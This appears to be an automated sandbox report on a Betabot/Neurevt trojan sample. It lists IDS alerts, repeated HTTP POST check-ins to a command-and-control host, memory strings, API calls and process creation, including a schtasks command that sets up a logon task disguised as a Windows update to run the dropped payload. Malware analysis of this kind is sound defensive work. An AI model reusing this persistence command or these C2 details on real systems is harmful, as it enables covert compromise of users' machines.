                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:52688 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49700 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49700 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49700 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:58472 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49701 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49701 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49701 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:50902 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49702 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49702 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49702 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:53555 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49703 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49703 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2023765 ET TROJAN Betabot Checkin 5 192.168.2.5:49703 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.5:54585 -> 8.8.8.8:53
                      Source: Traffic Snort IDS: 2807970 ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 192.168.2.5:49704 -> 64.70.19.203:80
                      Source: Traffic Snort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49704 -> 64.70.19.203:80
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=9504479 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1062 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?page=70 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1018 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=1637135 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1025 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1032 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=7277094 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1062 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1050 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1022 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=4981026 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1086 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1025 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1068 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?page=69 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1048 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?page=127 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1054 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1042 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?page=33 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1008 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?pid=631 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1054 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=4923518 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1010 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?pid=668 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1024 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=8413675 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1050 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1044 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=8088252 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1024 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1052 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1048 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=3966837 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1066 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1052 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1018 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=1465544 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1042 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1062 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?page=38 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1040 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1018 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?pid=925 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1046 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=575573 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1078 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1078 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=8314615 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1040 Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: POST /xyz/abc/order.php?id=5889637 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: issasname.ws Content-Length: 1056 Cache-Control: no-cache
                      Source: C:\Windows\SysWOW64\WerFault.exe Code function: 4_2_02870D19 closesocket, update.microsoft.com 4_2_02870D19
                      Source: Joe Sandbox View ASN Name: CENTURYLINK-LEGACY-SAVVISUS CENTURYLINK-LEGACY-SAVVISUS
                      Source: Joe Sandbox View IP Address: 64.70.19.203 64.70.19.203
                      Source: BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://%s%s/image.php?id=%s
                      Source: BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmp | String found in binary or memory: http://%s%s/image.php?id=%sRtlQueryElevationFlagsCritical
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php
                      Source: WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php1
                      Source: WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php1EC24CF002C2
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php9p
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=3966837
                      Source: WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=575573
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=5889637
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=5889637F
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=5889637rivers
                      Source: WerFault.exe, 00000004.00000002.572746061.0000000004C40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=8088252ZoFl
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=8314615
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=8314615Fv
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=9504479
                      Source: WerFault.exe, 00000004.00000003.398882163.00000000003AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=9504479A
                      Source: WerFault.exe, 00000004.00000002.565612970.0000000000315000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?page=7
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?page=7-
                      Source: WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?page=70
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.php?page=72
                      Source: WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.phpDESKTOP-
                      Source: WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.phpO
                      Source: WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.phpcrosoft
                      Source: WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://issasname.ws/xyz/abc/order.phpion
                      Source: unknown | HTTP traffic detected: POST /xyz/abc/order.php?id=9504479 HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: issasname.ws | Content-Length: 1062 | Cache-Control: no-cache
                      Source: unknown | DNS traffic detected: queries for: issasname.pw
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A79BB4 URLDownloadToFileW
                      Source: yvneslhpc.exe, 00000003.00000002.306282394.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: BbbEtaIxAU.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_0286E06B
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028673CD
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_0286745E
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A6E06B
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A673CD
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 5_2_03A6745E
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 6_2_0333E06B
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 6_2_033373CD
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 6_2_0333745E
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 7_2_03B6E06B
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 7_2_03B673CD
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: 7_2_03B6745E
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: String function: 02867DF1 appears 45 times
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: String function: 02871FAD appears 31 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: String function: 03337DF1 appears 45 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: String function: 03341FAD appears 31 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: String function: 03B71FAD appears 31 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: String function: 03B67DF1 appears 45 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: String function: 03A67DF1 appears 45 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Code function: String function: 03A71FAD appears 31 times
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02865BED NtSetInformationThread
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_0286DB20 NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028660AA NtSetInformationThread,NtTerminateThread
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_0286E06B Sleep,NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02864E69 NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028644A2 NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_028644F0 NtQueryInformationProcess,NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02864D45 NtQueryInformationProcess
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02880D68 NtCreateSection,NtClose
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02880E92 NtClose
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02880EDD NtClose
                      Source: C:\Windows\SysWOW64\WerFault.exe | Code function: 4_2_02880E43 NtClose
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Section loaded: sfc.dll
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe | Section loaded: sfc.dll
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe | Section loaded: sfc.dll
                      Source: BbbEtaIxAU.exe | Static PE information: Section: .rsrc ZLIB complexity 0.9925239934456929
                      Source: BbbEtaIxAU.exe | ReversingLabs: Detection: 89%
                      Source: BbbEtaIxAU.exe | Virustotal: Detection: 92%
                      Source: BbbEtaIxAU.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Users\user\Desktop\BbbEtaIxAU.exe C:\Users\user\Desktop\BbbEtaIxAU.exe
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHEST
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
